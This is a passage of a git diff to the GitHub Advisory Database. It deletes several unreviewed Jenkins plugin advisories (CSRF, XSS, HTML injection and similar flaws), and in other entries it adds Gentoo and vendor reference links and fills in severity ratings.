+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5491"
diff --git a/advisories/unreviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json b/advisories/unreviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json
deleted file mode 100644
index da8a5a0c61ebf..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-4gh2-m88h-8cj8",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41939"
- ],
- "details": "Jenkins SSH2 Easy Plugin 1.4 and earlier does not verify that permissions configured to be granted are enabled, potentially allowing users formerly granted (typically optional permissions, like Overall/Manage) to access functionality they're no longer entitled to.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41939"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3064"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:10Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json b/advisories/unreviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json
deleted file mode 100644
index a472fc8c7c3e3..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-5jxp-f5rr-g6jc",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41931"
- ],
- "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not property sanitize or escape the timestamp value from history entries when rendering a history entry on the history view, resulting in a stored cross-site scripting (XSS) vulnerability.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41931"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3233"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:09Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json b/advisories/unreviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json
deleted file mode 100644
index be89dfa4c105e..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-63vw-rprv-4f8j",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41938"
- ],
- "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Ivy Plugin 2.5 and earlier allows attackers to delete disabled modules.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41938"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3093"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:10Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-6xcr-xqjv-c7jp/GHSA-6xcr-xqjv-c7jp.json b/advisories/unreviewed/2023/09/GHSA-6xcr-xqjv-c7jp/GHSA-6xcr-xqjv-c7jp.json
index 31f25383162d0..3e2295aad5c04 100644
--- a/advisories/unreviewed/2023/09/GHSA-6xcr-xqjv-c7jp/GHSA-6xcr-xqjv-c7jp.json
+++ b/advisories/unreviewed/2023/09/GHSA-6xcr-xqjv-c7jp/GHSA-6xcr-xqjv-c7jp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-6xcr-xqjv-c7jp",
- "modified": "2023-09-27T21:30:31Z",
+ "modified": "2024-01-31T15:30:18Z",
 "published": "2023-09-27T15:30:34Z",
 "aliases": [
 "CVE-2023-35074"
@@ -25,6 +25,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EEMDC5TQAANFH5D77QM34ZTUKXPFGVL/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-33"
+ },
 {
 "type": "WEB",
 "url": "https://support.apple.com/en-us/HT213936"
@@ -74,7 +78,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-27T15:18:52Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-84c6-x9x8-7q38/GHSA-84c6-x9x8-7q38.json b/advisories/unreviewed/2023/09/GHSA-84c6-x9x8-7q38/GHSA-84c6-x9x8-7q38.json
index 05031a7847f24..2ce4a41fa30a9 100644
--- a/advisories/unreviewed/2023/09/GHSA-84c6-x9x8-7q38/GHSA-84c6-x9x8-7q38.json
+++ b/advisories/unreviewed/2023/09/GHSA-84c6-x9x8-7q38/GHSA-84c6-x9x8-7q38.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-84c6-x9x8-7q38",
- "modified": "2023-09-27T18:30:24Z",
+ "modified": "2024-01-31T15:30:18Z",
 "published": "2023-09-27T15:30:35Z",
 "aliases": [
 "CVE-2023-39434"
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39434"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-33"
+ },
 {
 "type": "WEB",
 "url": "https://support.apple.com/en-us/HT213937"
@@ -54,7 +58,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-27T15:18:56Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-84xc-6h2g-44j4/GHSA-84xc-6h2g-44j4.json b/advisories/unreviewed/2023/09/GHSA-84xc-6h2g-44j4/GHSA-84xc-6h2g-44j4.json
index 0b4760a2338ef..e4bf427279833 100644
--- a/advisories/unreviewed/2023/09/GHSA-84xc-6h2g-44j4/GHSA-84xc-6h2g-44j4.json
+++ b/advisories/unreviewed/2023/09/GHSA-84xc-6h2g-44j4/GHSA-84xc-6h2g-44j4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-84xc-6h2g-44j4",
- "modified": "2023-09-15T15:30:14Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4901"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:08Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-8cgp-x4c5-vg9g/GHSA-8cgp-x4c5-vg9g.json b/advisories/unreviewed/2023/09/GHSA-8cgp-x4c5-vg9g/GHSA-8cgp-x4c5-vg9g.json
index 7b7dac1162ef4..a6cc175fc0b51 100644
--- a/advisories/unreviewed/2023/09/GHSA-8cgp-x4c5-vg9g/GHSA-8cgp-x4c5-vg9g.json
+++ b/advisories/unreviewed/2023/09/GHSA-8cgp-x4c5-vg9g/GHSA-8cgp-x4c5-vg9g.json
@@ -49,6 +49,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5491"
diff --git a/advisories/unreviewed/2023/09/GHSA-8j7g-fq3w-jp2m/GHSA-8j7g-fq3w-jp2m.json b/advisories/unreviewed/2023/09/GHSA-8j7g-fq3w-jp2m/GHSA-8j7g-fq3w-jp2m.json
index 478e8a0f35b9f..3798db62234fe 100644
--- a/advisories/unreviewed/2023/09/GHSA-8j7g-fq3w-jp2m/GHSA-8j7g-fq3w-jp2m.json
+++ b/advisories/unreviewed/2023/09/GHSA-8j7g-fq3w-jp2m/GHSA-8j7g-fq3w-jp2m.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8j7g-fq3w-jp2m",
- "modified": "2023-09-15T18:30:30Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4903"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:08Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-8vvp-9m42-3rr2/GHSA-8vvp-9m42-3rr2.json b/advisories/unreviewed/2023/09/GHSA-8vvp-9m42-3rr2/GHSA-8vvp-9m42-3rr2.json
index 0a942994c24fa..8569956570d0b 100644
--- a/advisories/unreviewed/2023/09/GHSA-8vvp-9m42-3rr2/GHSA-8vvp-9m42-3rr2.json
+++ b/advisories/unreviewed/2023/09/GHSA-8vvp-9m42-3rr2/GHSA-8vvp-9m42-3rr2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8vvp-9m42-3rr2",
- "modified": "2023-09-15T15:30:14Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4905"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:08Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-9246-g3q2-xx2v/GHSA-9246-g3q2-xx2v.json b/advisories/unreviewed/2023/09/GHSA-9246-g3q2-xx2v/GHSA-9246-g3q2-xx2v.json
index 02a225a6dd6f3..c01bc43af1b68 100644
--- a/advisories/unreviewed/2023/09/GHSA-9246-g3q2-xx2v/GHSA-9246-g3q2-xx2v.json
+++ b/advisories/unreviewed/2023/09/GHSA-9246-g3q2-xx2v/GHSA-9246-g3q2-xx2v.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9246-g3q2-xx2v",
- "modified": "2023-09-15T15:30:14Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4907"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:08Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json b/advisories/unreviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json
deleted file mode 100644
index 9d07448fd65d3..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-997j-37h7-mhg9",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41942"
- ],
- "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers to clear the SQS queue.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41942"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(2)"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json b/advisories/unreviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json
deleted file mode 100644
index 118be2d21a165..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9v8g-f9mq-739g",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41934"
- ],
- "details": "Jenkins Pipeline Maven Integration Plugin 1330.v18e473854496 and earlier does not properly mask (i.e., replace with asterisks) usernames of credentials specified in custom Maven settings in Pipeline build logs if \"Treat username as secret\" is checked.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41934"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3257"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:10Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-c7f5-x28q-2rr2/GHSA-c7f5-x28q-2rr2.json b/advisories/unreviewed/2023/09/GHSA-c7f5-x28q-2rr2/GHSA-c7f5-x28q-2rr2.json
index cebe54595b131..f6588e70461d4 100644
--- a/advisories/unreviewed/2023/09/GHSA-c7f5-x28q-2rr2/GHSA-c7f5-x28q-2rr2.json
+++ b/advisories/unreviewed/2023/09/GHSA-c7f5-x28q-2rr2/GHSA-c7f5-x28q-2rr2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c7f5-x28q-2rr2",
- "modified": "2023-09-15T15:30:14Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4900"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:08Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json b/advisories/unreviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json
deleted file mode 100644
index 97634a988adfe..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-c7r5-cww9-64q6",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41930"
- ],
- "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict the 'name' query parameter when rendering a history entry, allowing attackers to have Jenkins render a manipulated configuration history that was not created by the plugin.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41930"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3233"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:09Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json b/advisories/unreviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json
deleted file mode 100644
index f2c9fe378f17f..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-cgh7-rgqg-hrcx",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41932"
- ],
- "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict 'timestamp' query parameters in multiple endpoints, allowing attackers with to delete attacker-specified directories on the Jenkins controller file system as long as they contain a file called 'history.xml'.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41932"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3235"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:09Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json b/advisories/unreviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json
deleted file mode 100644
index 3a81dffa633d3..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-g4qf-5523-7wvf",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41944"
- ],
- "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not escape the queue name parameter passed to a form validation URL, when rendering an error message, resulting in an HTML injection vulnerability.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41944"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3102"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json b/advisories/unreviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json
deleted file mode 100644
index 8d06259a6f773..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-g6rx-2w84-xmgj",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41946"
- ],
- "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers to connect to Frugal Testing using attacker-specified credentials, and to retrieve test IDs and names from Frugal Testing, if a valid credential corresponds to the attacker-specified username.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41946"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3082"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-g8c4-rhfw-rcpw/GHSA-g8c4-rhfw-rcpw.json b/advisories/unreviewed/2023/09/GHSA-g8c4-rhfw-rcpw/GHSA-g8c4-rhfw-rcpw.json
index d44bb060770df..7f6d15d5c3a14 100644
--- a/advisories/unreviewed/2023/09/GHSA-g8c4-rhfw-rcpw/GHSA-g8c4-rhfw-rcpw.json
+++ b/advisories/unreviewed/2023/09/GHSA-g8c4-rhfw-rcpw/GHSA-g8c4-rhfw-rcpw.json
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5084"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hestiacp/hestiacp/pull/4013/commits/5131f5a966759df77477fdf7f29daa2bda93b1ff"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/hestiacp/hestiacp/commit/5131f5a966759df77477fdf7f29daa2bda93b1ff"
diff --git a/advisories/unreviewed/2023/09/GHSA-h54p-v85c-f69r/GHSA-h54p-v85c-f69r.json b/advisories/unreviewed/2023/09/GHSA-h54p-v85c-f69r/GHSA-h54p-v85c-f69r.json
index 8dda548262d7d..acd63c0283777 100644
--- a/advisories/unreviewed/2023/09/GHSA-h54p-v85c-f69r/GHSA-h54p-v85c-f69r.json
+++ b/advisories/unreviewed/2023/09/GHSA-h54p-v85c-f69r/GHSA-h54p-v85c-f69r.json
@@ -28,6 +28,10 @@
 {
 "type": "WEB",
 "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-887122.pdf"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.bentley.com/advisories/be-2023-0004/"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2023/09/GHSA-hg3r-958g-g8vq/GHSA-hg3r-958g-g8vq.json b/advisories/unreviewed/2023/09/GHSA-hg3r-958g-g8vq/GHSA-hg3r-958g-g8vq.json
index 9d7a85a2752a5..f9e914d1adb12 100644
--- a/advisories/unreviewed/2023/09/GHSA-hg3r-958g-g8vq/GHSA-hg3r-958g-g8vq.json
+++ b/advisories/unreviewed/2023/09/GHSA-hg3r-958g-g8vq/GHSA-hg3r-958g-g8vq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hg3r-958g-g8vq",
- "modified": "2023-09-29T21:30:41Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-28T18:30:45Z",
 "aliases": [
 "CVE-2023-5187"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5508"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-28T16:15:10Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-hg4h-2m22-83j4/GHSA-hg4h-2m22-83j4.json b/advisories/unreviewed/2023/09/GHSA-hg4h-2m22-83j4/GHSA-hg4h-2m22-83j4.json
index 5a240cbd0c6fb..959b32b1b7240 100644
--- a/advisories/unreviewed/2023/09/GHSA-hg4h-2m22-83j4/GHSA-hg4h-2m22-83j4.json
+++ b/advisories/unreviewed/2023/09/GHSA-hg4h-2m22-83j4/GHSA-hg4h-2m22-83j4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hg4h-2m22-83j4",
- "modified": "2023-09-16T00:30:30Z",
+ "modified": "2024-02-03T09:30:17Z",
 "published": "2023-09-16T00:30:30Z",
 "aliases": [
 "CVE-2023-36562"
@@ -24,13 +24,17 @@
 {
 "type": "WEB",
 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36562"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-05"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-15T22:15:13Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json b/advisories/unreviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json
deleted file mode 100644
index 1ce496b05a87c..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-hj7p-h74j-6gxj",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41935"
- ],
- "details": "Jenkins Azure AD Plugin 396.v86ce29279947 and earlier, except 378.380.v545b_1154b_3fb_, uses a non-constant time comparison function when checking whether the provided and expected CSRF protection nonce are equal, potentially allowing attackers to use statistical methods to obtain a valid nonce.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41935"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3227"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:10Z"
- }
-}
\ No newline at end of file
